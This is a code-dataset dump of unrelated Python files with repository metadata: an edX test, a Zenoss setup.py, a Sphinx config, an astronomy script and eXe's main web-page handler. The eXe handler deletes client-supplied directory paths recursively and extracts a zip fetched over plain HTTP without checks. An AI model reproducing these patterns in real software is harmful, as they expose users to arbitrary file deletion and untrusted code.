XBlockFixtureDesc('sequential', 'Test Subsection').add_children(
XBlockFixtureDesc('vertical', 'Test Unit').add_children(
XBlockFixtureDesc(
'problem',
self.alpha_text,
data=problem_data,
metadata={"group_access": {MINIMUM_STATIC_PARTITION_ID: [MINIMUM_STATIC_PARTITION_ID + 1]}}
),
XBlockFixtureDesc(
'problem',
self.beta_text,
data=problem_data,
metadata={"group_access": {MINIMUM_STATIC_PARTITION_ID: [MINIMUM_STATIC_PARTITION_ID + 2]}}
),
XBlockFixtureDesc(
'problem',
self.audit_text,
data=problem_data,
# Below, 1 is the hardcoded group ID for the "Audit" enrollment track
metadata={"group_access": {ENROLLMENT_TRACK_PARTITION_ID: [1]}}
),
XBlockFixtureDesc(
'problem',
self.everyone_text,
data=problem_data
)
)
)
)
)
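# Note: each "group_access" entry above maps a user-partition id to the list
# of group ids allowed to see that block, i.e. {partition_id: [group_id, ...]}.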
@attr(shard=20)
def test_staff_sees_all_problems(self):
"""
Scenario: Staff see all problems
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
Then I see all the problems, regardless of their group_access property
"""
course_page = self._goto_staff_page()
verify_expected_problem_visibility(
self,
course_page,
[self.alpha_text, self.beta_text, self.audit_text, self.everyone_text]
)
@attr(shard=3)
def test_student_not_in_content_group(self):
"""
Scenario: When previewing as a learner, only content visible to all is shown
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner
Then I see only problems visible to all users
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner')
verify_expected_problem_visibility(self, course_page, [self.everyone_text])
@attr(shard=3)
def test_as_student_in_alpha(self):
"""
Scenario: When previewing as a learner in group alpha, only content visible to alpha is shown
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner in group alpha
Then I see only problems visible to group alpha
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner in alpha')
verify_expected_problem_visibility(self, course_page, [self.alpha_text, self.everyone_text])
@attr(shard=3)
def test_as_student_in_beta(self):
"""
Scenario: When previewing as a learner in group beta, only content visible to beta is shown
Given I have a course with a cohort user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner in group beta
Then I see only problems visible to group beta
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner in beta')
verify_expected_problem_visibility(self, course_page, [self.beta_text, self.everyone_text])
@attr(shard=3)
def test_as_student_in_audit(self):
"""
Scenario: When previewing as a learner in the audit enrollment track, only content visible to audit is shown
Given I have a course with an enrollment_track user partition
And problems that are associated with specific groups in the user partition
When I view the courseware in the LMS with staff access
And I change to previewing as a Learner in audit enrollment track
Then I see only problems visible to audit enrollment track
"""
course_page = self._goto_staff_page()
course_page.set_staff_view_mode('Learner in Audit')
verify_expected_problem_visibility(self, course_page, [self.audit_text, self.everyone_text])
def create_cohorts_and_assign_students(self, student_a_username, student_b_username):
"""
Adds 2 manual cohorts, linked to content groups, to the course.
Each cohort is assigned one learner.
"""
instructor_dashboard_page = InstructorDashboardPage(self.browser, self.course_id)
instructor_dashboard_page.visit()
cohort_management_page = instructor_dashboard_page.select_cohort_management()
cohort_management_page.is_cohorted = True
def add_cohort_with_student(cohort_name, content_group, student):
""" Create cohort and assign learner to it. """
cohort_management_page.add_cohort(cohort_name, content_group=content_group)
cohort_management_page.add_students_to_selected_cohort([student])
add_cohort_with_student("Cohort Alpha", "alpha", student_a_username)
add_cohort_with_student("Cohort Beta", "beta", student_b_username)
cohort_management_page.wait_for_ajax()
@attr('a11y')
def test_course_page(self):
"""
Run accessibility audit for course staff pages.
"""
course_page = self._goto_staff_page()
course_page.a11y_audit.config.set_rules({
'ignore': [
'aria-allowed-attr', # TODO: AC-559
'aria-roles', # TODO: AC-559,
'aria-valid-attr', # TODO: AC-559
'color-contrast', # TODO: AC-559
'link-href', # TODO: AC-559
'section', # TODO: AC-559
]
})
course_page.a11y_audit.check_for_accessibility_errors()
def verify_expected_problem_visibility(test, courseware_page, expected_problems):
"""
Helper method that checks that the expected problems are visible on the current page.
"""
courseware_page.wait_for(
lambda: courseware_page.num_xblock_components == len(expected_problems), "Expected number of problems visible"
)
for index, expected_problem in enumerate(expected_problems):
test.assertIn(expected_problem, courseware_page.xblock_components[index].text)
|
philanthropy-u/edx-platform
|
common/test/acceptance/tests/lms/test_lms_user_preview.py
|
Python
|
agpl-3.0
| 17,913
|
[
"VisIt"
] |
f4246c3e31579ba529b2bc07cb06af2cfb9791205cb147a7f0d1d1351ebc17d2
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2008, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
################################
# These variables are overwritten by Zenoss when the ZenPack is exported
# or saved. Do not modify them directly here.
NAME = 'ZenPacks.AndreaConsadori.ASSP'
VERSION = '1.1'
AUTHOR = 'Andrea Consadori'
LICENSE = ''
NAMESPACE_PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori']
PACKAGES = ['ZenPacks', 'ZenPacks.AndreaConsadori', 'ZenPacks.AndreaConsadori.ASSP']
INSTALL_REQUIRES = []
COMPAT_ZENOSS_VERS = '>=2.2'
PREV_ZENPACK_NAME = ''
# STOP_REPLACEMENTS
################################
# Zenoss will not overwrite any changes you make below here.
from setuptools import setup, find_packages
setup(
# This ZenPack metadata should usually be edited with the Zenoss
# ZenPack edit page. Whenever the edit page is submitted it will
# overwrite the values below (the ones it knows about) with new values.
name = NAME,
version = VERSION,
author = AUTHOR,
license = LICENSE,
# This is the version spec which indicates what versions of Zenoss
# this ZenPack is compatible with
compatZenossVers = COMPAT_ZENOSS_VERS,
# previousZenPackName is a facility for telling Zenoss that the name
# of this ZenPack has changed. If no ZenPack with the current name is
# installed then a zenpack of this name if installed will be upgraded.
prevZenPackName = PREV_ZENPACK_NAME,
# Indicate to setuptools which namespace packages the zenpack
# participates in
namespace_packages = NAMESPACE_PACKAGES,
# Tell setuptools what packages this zenpack provides.
packages = find_packages(),
# Tell setuptools to figure out for itself which files to include
# in the binary egg when it is built.
include_package_data = True,
# Tell setuptools what non-python files should also be included
# with the binary egg.
package_data = {
# a single catch-all entry (duplicate '' keys would silently overwrite each other)
'': ['*.txt', '../COPYRIGHT.txt', '../LICENSE.txt'],
NAME: ['objects/*','skins/*/*','services/*', 'reports/*/*',
'modeler/*/*', 'daemons/*', 'lib/*', 'libexec/*',
'datasources/*', ],
},
# Indicate dependencies on other python modules or ZenPacks. This line
# is modified by zenoss when the ZenPack edit page is submitted. Zenoss
# tries to add/delete the names it manages at the beginning of this
# list, so any manual additions should be added to the end. Things will
# go poorly if this line is broken into multiple lines or modified too
# dramatically.
install_requires = INSTALL_REQUIRES,
# Every ZenPack egg must define exactly one zenoss.zenpacks entry point
# of this form.
entry_points = {
'zenoss.zenpacks': '%s = %s' % (NAME, NAME),
},
# All ZenPack eggs must be installed in unzipped form.
zip_safe = False,
)
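# Typical packaging sketch for a ZenPack like this one (commands assumed,
# not part of the original file):
#   python setup.py bdist_egg
#   zenpack --install dist/ZenPacks.AndreaConsadori.ASSP-*.egg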
|
zenoss/Community-Zenpacks
|
ZenPacks.AndreaConsadori.ASSP/setup.py
|
Python
|
gpl-2.0
| 3,327
|
[
"VisIt"
] |
514c0b7f6d699457587545c4b0f2f7cc8badc7b3be2f6414066d2e19884e967e
|
# -*- coding: utf-8 -*-
#
# Asterisk IVR documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 14 16:14:39 2016.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
#import mock
from mock import MagicMock
#
MOCK_MODULES = ['asterisk.agi', 'asterisk.agi.AGI', 'asterisk.agi.AGI.answer']
for mod_name in MOCK_MODULES:
sys.modules[mod_name] = MagicMock()
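# Stubbing these names in sys.modules lets sphinx.ext.autodoc import the IVR
# code on a docs host where the asterisk/pyst package is not installed; the
# MagicMock instances stand in for the real AGI interface during the build.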
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('../ivr'))
autoclass_content = 'both'
#html_style = 'css/my_theme.css'
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
#extensions = ['sphinx.ext.autodoc',]
extensions = ['sphinx.ext.autodoc','sphinx.ext.napoleon',]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Asterisk IVR'
copyright = u'2016, Brian LaVallee'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.0.2'
# The full version, including alpha/beta/rc tags.
release = '0.0.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'AsteriskIVRdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'AsteriskIVR.tex', u'Asterisk IVR Documentation',
u'Brian LaVallee', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
invitecomm/asterisk-ivr
|
docs/conf.py
|
Python
|
gpl-3.0
| 6,709
|
[
"Brian"
] |
83894ba7dd98eeb8b05cf433ab1753b422a90865b1ee3eabbae5260e8ce793b9
|
#!/usr/bin/env python
import os
import numpy as np
from astropy.io import fits
import scipy.optimize
import scipy.signal
from scipy.misc import imsave  # note: scipy.misc.imsave was removed in SciPy 1.2
import scipy.ndimage
def gaussian(coordinates, height, *centroid_and_width):
"""
The n-dimensional symmetric Gaussian distribution
Expects a coordinate array with one row per dimension (or reshapeable to
that), i.e. [y1,y2,y3,...,x1,x2,x3,...] for the 2-D case.
Integral (2-D case) = height*2*np.pi*width**2
"""
width = centroid_and_width[-1]
centroids = centroid_and_width[:-1]
pos = coordinates.reshape((len(centroids),-1)).copy()
for i in range(len(centroids)):
pos[i] -= centroids[i]
dst = np.sum(pos**2,0)
return height*np.exp(-dst/(2*width**2))
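# A minimal usage sketch (hypothetical values): a symmetric 2-D Gaussian of
# height 1 and width 2 centred on (5, 5), evaluated over an 11x11 grid:
#   coords = np.mgrid[:11, :11]                    # shape (2, 11, 11)
#   values = gaussian(coords, 1.0, 5.0, 5.0, 2.0)  # flat array, length 121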
def genfiles(path, file_extension='fits'):
"""Produce a generator that yields files ending with file_extension in directory path"""
for entry in os.scandir(path):
if entry.is_file() and entry.name.endswith(file_extension):
yield entry.path
if __name__ == "__main__":
EXTENSIONS = ['fits', 'fit']
INPUT_DIR = "../sample_data"
OUTPUT_DIR = "."
FILTER_WIDTH = 1.5
APERTURE_RADIUS = 5
files = sorted(genfiles(INPUT_DIR))  # materialise the generator: it is indexed and len()ed below
# Open up the first file to figure out how big the images are so we can know the shape of the array to allocate
image = fits.open(files[0])[0].data
stack = np.empty((len(files),)+image.shape)
stack[0] = image.copy()
for f, fname in enumerate(files[1:], start=1):  # stack[0] already holds the first image
    stack[f] = fits.open(fname)[0].data
stacked = np.median(stack, axis=0, overwrite_input=True)
smooth = scipy.ndimage.gaussian_filter(stacked, FILTER_WIDTH)
laplace = scipy.ndimage.laplace(smooth)
# Candidate stars are local minima of the Laplacian (i.e. peaks in the image)
stars_inds = scipy.signal.argrelmin(laplace)
stars = np.zeros(stacked.shape, bool)
stars[stars_inds] = True
sky_value = np.median(stacked)
# keep only peaks more than ~2 sigma (Poisson) above the sky estimate
signal = stacked > (sky_value + 2*np.sqrt(sky_value))
stars &= signal
coordinates = np.mgrid[:stacked.shape[0], :stacked.shape[1]]
coord = np.mgrid[:2*APERTURE_RADIUS+1, :2*APERTURE_RADIUS+1] - APERTURE_RADIUS
dst = np.sum(coord**2, 0)
ap = dst <= APERTURE_RADIUS**2  # circular aperture mask centred on the cutout
star_positions = np.argwhere(stars)  # (N, 2) array of (y, x) peak positions
# keep only peaks far enough from the edges for a full aperture cutout
ylim, xlim = stacked.shape
good = ((star_positions[:, 0] >= APERTURE_RADIUS) &
        (star_positions[:, 0] < ylim - APERTURE_RADIUS) &
        (star_positions[:, 1] >= APERTURE_RADIUS) &
        (star_positions[:, 1] < xlim - APERTURE_RADIUS))
star_positions = star_positions[good]
star_vectors = np.empty((star_positions.shape[0], 4))  # height, y, x, width per star
output_test = np.zeros(stacked.shape)
for i, (y, x) in enumerate(star_positions):
    cutout_coords = coordinates[:, y-APERTURE_RADIUS:y+APERTURE_RADIUS+1,
                                x-APERTURE_RADIUS:x+APERTURE_RADIUS+1][:, ap]
    # fit the sky-subtracted cutout, since the model has no offset term
    star_data = stacked[y-APERTURE_RADIUS:y+APERTURE_RADIUS+1,
                        x-APERTURE_RADIUS:x+APERTURE_RADIUS+1][ap] - sky_value
    guesses = [stacked[y, x]-sky_value, y, x, 1.]
    fit, _ = scipy.optimize.curve_fit(gaussian, cutout_coords, star_data, p0=guesses)
    star_vectors[i] = fit
    output_test[y-APERTURE_RADIUS:y+APERTURE_RADIUS+1,
                x-APERTURE_RADIUS:x+APERTURE_RADIUS+1][ap] += gaussian(cutout_coords, *fit)
np.save('vectorized.npy',star_vectors)
imsave('vectorized.png', np.log(output_test + 1))  # +1 avoids log(0) on empty pixels
|
Saethlin/astrotools
|
vectorize_starfield.py
|
Python
|
mit
| 3,096
|
[
"Gaussian"
] |
7e782631efb8b5ffb096f4b60b38d9703734d3891c4683c70317dc0619211899
|
# -- coding: utf-8 --
# ===========================================================================
# eXe
# Copyright 2012, Pedro Peña Pérez, Open Phoenix IT
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# ===========================================================================
"""
This is the main Javascript page.
"""
import os
import json
import sys
import logging
import traceback
import shutil
import tempfile
from exe.engine.version import release, revision
from twisted.internet import threads, reactor
from exe.webui.livepage import RenderableLivePage,\
otherSessionPackageClients, allSessionClients, allSessionPackageClients
from nevow import loaders, inevow, tags
from nevow.livepage import handler, IClientHandle
from exe.jsui.idevicepane import IdevicePane
from exe.jsui.outlinepane import OutlinePane
from exe.jsui.recentmenu import RecentMenu
from exe.jsui.stylemenu import StyleMenu
from exe.jsui.propertiespage import PropertiesPage
from exe.webui.authoringpage import AuthoringPage
from exe.webui.renderable import File
from exe.export.websiteexport import WebsiteExport
from exe.export.textexport import TextExport
from exe.export.singlepageexport import SinglePageExport
from exe.export.scormexport import ScormExport
from exe.export.imsexport import IMSExport
from exe.export.xliffexport import XliffExport
from exe.importers.xliffimport import XliffImport
from exe.importers.scanresources import Resources
from exe.engine.path import Path, toUnicode, TempDirPath
from exe.engine.package import Package
from exe import globals as G
from tempfile import mkdtemp
from exe.engine.mimetex import compile
from urllib import unquote, urlretrieve
from exe.engine.locationbuttons import LocationButtons
from exe.export.epub3export import Epub3Export
from exe.export.xmlexport import XMLExport
from exe.engine.lom import lomsubs
from exe.engine.lom.lomclassification import Classification
import zipfile
log = logging.getLogger(__name__)
class MainPage(RenderableLivePage):
"""
This is the main Javascript page. Responsible for handling URLs.
"""
_templateFileName = 'mainpage.html'
name = 'to_be_defined'
def __init__(self, parent, package, session, config):
"""
Initialize a new Javascript page
'package' is the package that we look after
"""
self.name = package.name
self.session = session
RenderableLivePage.__init__(self, parent, package, config)
self.putChild("resources", File(package.resourceDir))
#styles directory
#self.putChild("stylecss", File(self.config.stylesDir)
mainjs = Path(self.config.jsDir).joinpath('templates', 'mainpage.html')
self.docFactory = loaders.htmlfile(mainjs)
# Create all the children on the left
self.outlinePane = OutlinePane(self)
self.idevicePane = IdevicePane(self)
self.styleMenu = StyleMenu(self)
self.recentMenu = RecentMenu(self)
# And in the main section
self.propertiesPage = PropertiesPage(self)
self.authoringPage = None
self.previewDir = None
self.authoringPages = {}
self.classificationSources = {}
G.application.resourceDir = Path(package.resourceDir)
self.location_buttons = LocationButtons()
def child_authoring(self, ctx):
"""Returns the authoring page that corresponds to the url http://127.0.0.1:port/package_name/authoring"""
request = inevow.IRequest(ctx)
if 'clientHandleId' in request.args:
clientid = request.args['clientHandleId'][0]
if clientid not in self.authoringPages:
self.authoringPages[clientid] = AuthoringPage(self)
self.children.pop('authoring')
return self.authoringPages[clientid]
else:
raise Exception('No clientHandleId in request')
def child_preview(self, ctx):
if not self.package.previewDir:
stylesDir = self.config.stylesDir / self.package.style
self.package.previewDir = TempDirPath()
self.exportWebSite(None, self.package.previewDir, stylesDir)
self.previewPage = File(self.package.previewDir / self.package.name)
return self.previewPage
def child_taxon(self, ctx):
"""
Doc
"""
request = inevow.IRequest(ctx)
data = []
if 'source' in request.args:
if 'identifier' in request.args:
source = request.args['source'][0]
if source:
if not source in self.classificationSources:
self.classificationSources[source] = Classification()
try:
self.classificationSources[source].setSource(source, self.config.configDir)
except:
pass
identifier = request.args['identifier'][0]
if identifier == 'false':
identifier = False
if source.startswith("etb-lre_mec-ccaa"):
stype = 2
else:
stype = 1
try:
data = self.classificationSources[source].getDataByIdentifier(identifier, stype=stype)
except:
pass
return json.dumps({'success': True, 'data': data})
def goingLive(self, ctx, client):
"""Called each time the page is served/refreshed"""
# inevow.IRequest(ctx).setHeader('content-type', 'application/vnd.mozilla.xul+xml')
# Set up named server side funcs that js can call
def setUpHandler(func, name, *args, **kwargs):
"""
Convenience function to link funcs to handler ids
and store them
"""
kwargs['identifier'] = name
hndlr = handler(func, *args, **kwargs)
hndlr(ctx, client) # Stores it
setUpHandler(self.handleIsPackageDirty, 'isPackageDirty')
setUpHandler(self.handlePackageFileName, 'getPackageFileName')
setUpHandler(self.handleSavePackage, 'savePackage')
setUpHandler(self.handleLoadPackage, 'loadPackage')
setUpHandler(self.recentMenu.handleLoadRecent, 'loadRecent')
setUpHandler(self.handleLoadTutorial, 'loadTutorial')
setUpHandler(self.recentMenu.handleClearRecent, 'clearRecent')
setUpHandler(self.handleImport, 'importPackage')
setUpHandler(self.handleCancelImport, 'cancelImportPackage')
setUpHandler(self.handleExport, 'exportPackage')
setUpHandler(self.handleXliffExport, 'exportXliffPackage')
setUpHandler(self.handleQuit, 'quit')
setUpHandler(self.handleBrowseURL, 'browseURL')
setUpHandler(self.handleMergeXliffPackage, 'mergeXliffPackage')
setUpHandler(self.handleInsertPackage, 'insertPackage')
setUpHandler(self.handleExtractPackage, 'extractPackage')
setUpHandler(self.outlinePane.handleSetTreeSelection,
'setTreeSelection')
setUpHandler(self.handleClearAndMakeTempPrintDir,
'makeTempPrintDir')
setUpHandler(self.handleRemoveTempDir, 'removeTempDir')
setUpHandler(self.handleTinyMCEimageChoice, 'previewTinyMCEimage')
setUpHandler(self.handleTinyMCEmath, 'generateTinyMCEmath')
setUpHandler(self.handleTestPrintMsg, 'testPrintMessage')
setUpHandler(self.handleReload, 'reload')
setUpHandler(self.handleSourcesDownload, 'sourcesDownload')
#For the new ExtJS 4.0 interface
setUpHandler(self.outlinePane.handleAddChild, 'AddChild')
setUpHandler(self.outlinePane.handleDelNode, 'DelNode')
setUpHandler(self.outlinePane.handleRenNode, 'RenNode')
setUpHandler(self.outlinePane.handlePromote, 'PromoteNode')
setUpHandler(self.outlinePane.handleDemote, 'DemoteNode')
setUpHandler(self.outlinePane.handleUp, 'UpNode')
setUpHandler(self.outlinePane.handleDown, 'DownNode')
setUpHandler(self.handleCreateDir, 'CreateDir')
self.idevicePane.client = client
self.styleMenu.client = client
self.webServer.stylemanager.client = client
if not self.webServer.monitoring:
self.webServer.monitoring = True
self.webServer.monitor()
def render_config(self, ctx, data):
config = {'lastDir': G.application.config.lastDir,
'locationButtons': self.location_buttons.buttons,
'lang': G.application.config.locale.split('_')[0],
'showPreferences': G.application.config.showPreferencesOnStart == '1' and not G.application.preferencesShowed,
'loadErrors': G.application.loadErrors,
'showIdevicesGrouped': G.application.config.showIdevicesGrouped == '1',
'authoringIFrameSrc': '%s/authoring?clientHandleId=%s' % (self.package.name, IClientHandle(ctx).handleId),
'pathSep': os.path.sep
}
G.application.preferencesShowed = True
G.application.loadErrors = []
return tags.script(type="text/javascript")["var config = %s" % json.dumps(config)]
def render_jsuilang(self, ctx, data):
return ctx.tag(src="../jsui/i18n/" + unicode(G.application.config.locale) + ".js")
def render_extjslang(self, ctx, data):
return ctx.tag(src="../jsui/extjs/locale/ext-lang-" + unicode(G.application.config.locale) + ".js")
def render_htmllang(self, ctx, data):
lang = G.application.config.locale.replace('_', '-').split('@')[0]
attribs = {'lang': unicode(lang), 'xml:lang': unicode(lang), 'xmlns': 'http://www.w3.org/1999/xhtml'}
return ctx.tag(**attribs)
def render_version(self, ctx, data):
return [tags.p()["Version: %s" % release],tags.p()["Revision: %s" % revision]]
def handleTestPrintMsg(self, client, message):
"""
Prints a test message, and yup, that's all!
"""
print "Test Message: ", message, " [eol, eh!]"
def handleIsPackageDirty(self, client, ifClean, ifDirty):
"""
Called by js to know if the package is dirty or not.
ifClean is JavaScript to be evaled on the client if the package has
not been changed
ifDirty is JavaScript to be evaled on the client if the package has
been changed
"""
if self.package.isChanged:
client.sendScript(ifDirty)
else:
client.sendScript(ifClean)
def handlePackageFileName(self, client, onDone, onDoneParam):
"""
Calls the javascript func named by 'onDone' passing as the
only parameter the filename of our package. If the package
has never been saved or loaded, it passes an empty string
'onDoneParam' will be passed to onDone as a param after the
filename
"""
client.call(onDone, unicode(self.package.filename), onDoneParam)
def b4save(self, client, inputFilename, ext, msg):
"""
Call this before saving a file to get the right filename.
Returns the corrected filename; alerts the user and raises on an
attempt to override an existing file.
'inputFilename' is the filename given by the user
'ext' is the extension that the filename should have
'msg' will be shown if the filename already exists
"""
if not inputFilename.lower().endswith(ext):
inputFilename += ext
if Path(inputFilename).exists():
explanation = _(u'"%s" already exists.\nPlease try again with a different filename') % inputFilename
msg = u'%s\n%s' % (msg, explanation)
client.alert(msg)
raise Exception(msg)
return inputFilename
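    # Example usage (mirrors handleSavePackage below): ensure an .elp
    # extension and refuse to clobber an existing file:
    #   filename = self.b4save(client, filename, '.elp', _(u'SAVE FAILED!'))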
def handleSavePackage(self, client, filename=None, onDone=None):
"""
Save the current package
'filename' is the filename to save the package to
'onDone' will be evaled after saving instead or redirecting
to the new location (in cases of package name changes).
(This is used where the user goes file|open when their
package is changed and needs saving)
"""
filename = Path(filename, 'utf-8')
saveDir = filename.dirname()
if saveDir and not saveDir.isdir():
client.alert(_(u'Cannot access directory named ') + unicode(saveDir) + _(u'. Please use ASCII names.'))
return
oldName = self.package.name
# If the script is not passing a filename to us,
# Then use the last filename that the package was loaded from/saved to
if not filename:
filename = self.package.filename
assert filename, 'Somehow save was called without a filename on a package that has no default filename.'
# Add the extension if it's not already there and give a message if not saved
filename = self.b4save(client, filename, '.elp', _(u'SAVE FAILED!'))
try:
self.package.save(filename) # This can change the package name
except Exception, e:
client.alert(_('SAVE FAILED!\n%s') % str(e))
raise
# Tell the user and continue
if onDone:
client.alert(_(u'Package saved to: %s') % filename, onDone)
elif self.package.name != oldName:
# Redirect the client if the package name has changed
self.webServer.root.putChild(self.package.name, self)
log.info('Package saved, redirecting client to /%s' % self.package.name)
client.alert(_(u'Package saved to: %s') % filename, 'eXe.app.gotoUrl("/%s")' % self.package.name.encode('utf8'), \
filter_func=otherSessionPackageClients)
else:
client.alert(_(u'Package saved to: %s') % filename, filter_func=otherSessionPackageClients)
def handleLoadPackage(self, client, filename, filter_func=None):
"""Load the package named 'filename'"""
package = self._loadPackage(client, filename, newLoad=True)
self.session.packageStore.addPackage(package)
self.webServer.root.bindNewPackage(package, self.session)
client.sendScript((u'eXe.app.gotoUrl("/%s")' % \
package.name).encode('utf8'), filter_func=filter_func)
def handleLoadTutorial(self, client):
"""
Loads the tutorial file, from the Help menu
"""
filename = self.config.webDir.joinpath("docs")\
.joinpath("eXe-tutorial.elp")
self.handleLoadPackage(client, filename)
def progressDownload(self, numblocks, blocksize, filesize, client):
try:
percent = min((numblocks * blocksize * 100) / filesize, 100)
except:
percent = 100
client.sendScript('Ext.MessageBox.updateProgress(%f, "%d%%", "Downloading...")' % (float(percent) / 100, percent))
log.info('%3d' % (percent))
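    # Worked example: 50 blocks of 8192 bytes received from an 819200-byte
    # file gives min((50 * 8192 * 100) / 819200, 100) == 50, i.e. 50%.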
def handleSourcesDownload(self, client):
"""
Download taxon sources from url and deploy in $HOME/.exe/classification_sources
"""
url = 'http://forja.cenatic.es/frs/download.php/file/1624/classification_sources.zip'
client.sendScript('Ext.MessageBox.progress("Sources Download", "Connecting to classification sources repository...")')
d = threads.deferToThread(urlretrieve, url, None, lambda n, b, f: self.progressDownload(n, b, f, client))
def successDownload(result):
filename = result[0]
if not zipfile.is_zipfile(filename):
return None
zipFile = zipfile.ZipFile(filename, "r")
try:
zipFile.extractall(G.application.config.configDir)
client.sendScript('Ext.MessageBox.updateProgress(1, "100%", "Success!")')
finally:
Path(filename).remove()
d.addCallback(successDownload)
def handleReload(self, client):
self.location_buttons.updateText()
client.sendScript('eXe.app.gotoUrl()', filter_func=allSessionClients)
def handleRemoveTempDir(self, client, tempdir, rm_top_dir):
"""
Removes a temporary directory and any contents therein
(from the bottom up), and yup, that's all!
#
# swiped from an example on:
# http://docs.python.org/lib/os-file-dir.html
################################################################
# Delete everything reachable from the directory named in 'top',
# assuming there are no symbolic links.
# CAUTION: This is dangerous! For example, if top == '/', it
# could delete all your disk files.
"""
top = tempdir
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
##################################################################
# and finally, go ahead and remove the top-level tempdir itself:
if (int(rm_top_dir) != 0):
os.rmdir(tempdir)
def get_printdir_relative2web(self, exported_dir):
"""
related to the following ClearParentTempPrintDirs(), return a
local URL corresponding to the exported_dir
"""
rel_name = exported_dir[len(G.application.tempWebDir):]
if sys.platform[:3] == "win":
rel_name = rel_name.replace('\\', '/')
if rel_name.startswith('/'):
rel_name = rel_name[1:]
